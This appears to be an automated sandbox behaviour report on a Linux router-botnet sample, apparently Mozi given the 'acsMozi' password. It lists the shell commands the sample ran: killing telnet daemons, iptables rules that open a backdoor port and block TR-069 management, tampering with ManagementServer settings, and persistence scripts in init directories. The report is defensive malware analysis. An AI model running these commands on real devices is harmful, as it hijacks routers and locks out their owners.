Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/rcS.d/S95baby.sh			Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/rc.local			Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 4604)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4294/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/230/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/231/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/232/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/233/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/234/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3512/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/359/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1452/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3632/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4600/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4602/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3518/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/10/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1339/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4605/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/11/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/12/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/13/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/14/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/15/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/16/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/17/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/18/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/19/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/483/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3527/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3527/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/2/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3525/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1346/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3524/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3524/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/4/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3523/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/5/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/7/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/8/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/9/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/20/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/21/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/22/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/23/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/24/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/25/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/28/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/29/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1363/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3541/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3541/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1362/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/496/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/496/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/30/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/31/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/31/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1119/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3790/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3791/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3310/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3431/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3431/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3550/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/260/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/263/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/264/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/385/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/144/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/386/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/145/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/146/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3546/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3546/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/147/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3303/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3545/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/148/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/149/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3543/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/822/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/822/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3308/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3308/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3429/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/3429/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/47/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/48/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/48/cmdline	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/49/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/150/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/271/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/151/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/152/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/153/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/395/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/396/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/154/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/155/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/156/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/1017/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/157/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/158/stat	Jump to behavior
Source: /usr/bin/killall (PID: 4604)	File opened: /proc/159/stat	Jump to behavior

Executes commands using a shell command-line interpreter

Source: /tmp/nT7K5GG5km (PID: 4602)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4636)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4670)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4674)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4715)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4724)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4750)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4759)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4775)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4813)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4816)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4828)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4855)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4882)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4891)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4893)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4904)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4931)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4955)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4979)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4988)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5005)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5031)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5057)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5065)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5085)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5111)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5137)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5149)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5160)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5182)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5210)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5219)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5248)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 5257)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"	Jump to behavior

Executes the "iptables" command used for managing IP filtering and manipulation

Source: /bin/sh (PID: 4638)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4672)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4679)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4720)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4732)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4755)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4763)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4785)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4815)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4819)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4838)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4866)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4896)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4939)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4966)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4986)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4992)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5015)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5042)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5063)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5071)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5095)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5119)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5139)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5158)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5194)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5215)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5229)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5253)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5265)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT	Jump to behavior

Reads system information from the proc file system

Source: /tmp/nT7K5GG5km (PID: 4627)

Reads from proc file: /proc/stat

Jump to behavior

Sample tries to set the executable flag

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /usr/networks (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Writes ELF files to disk

Source: /tmp/nT7K5GG5km (PID: 4600)

File written: /usr/networks

Jump to dropped file

Writes shell script files to disk

Source: /tmp/nT7K5GG5km (PID: 4600)	Shell script file created: /etc/rcS.d/S95baby.sh			Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	Shell script file created: /etc/init.d/S95baby.sh			Jump to dropped file

Source: submitted sample

Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

Drops files in suspicious directories

Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/S95baby.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountall.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/checkfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/umountnfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountkernfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/checkroot-bootclean.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountnfs-bootclean.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/bootmisc.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/checkroot.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/hwclock.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/hostname.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountdevsubfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountall-bootclean.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /etc/init.d/mountnfs.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /usr/bin/gettext.sh	Jump to dropped file
Source: /tmp/nT7K5GG5km (PID: 4600)	File: /usr/sbin/alsa-info.sh	Jump to dropped file

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 52478 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 53350 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 54390 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49152 -> 54390

Malware Analysis System Evasion:

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/nT7K5GG5km (PID: 4587)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4600)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/nT7K5GG5km (PID: 4623)	Queries kernel information via 'uname':	Jump to behavior
Source: /sbin/modprobe (PID: 4639)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5330)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5349)	Queries kernel information via 'uname':	Jump to behavior

Source: kvm-test-1-run.sh.8.dr	Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr	Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr	Binary or memory string: --qemu-args\|--qemu-arg)
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid $[0-9]$.$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr	Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr	Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr	Binary or memory string: # identify_qemu_append qemu-cmd
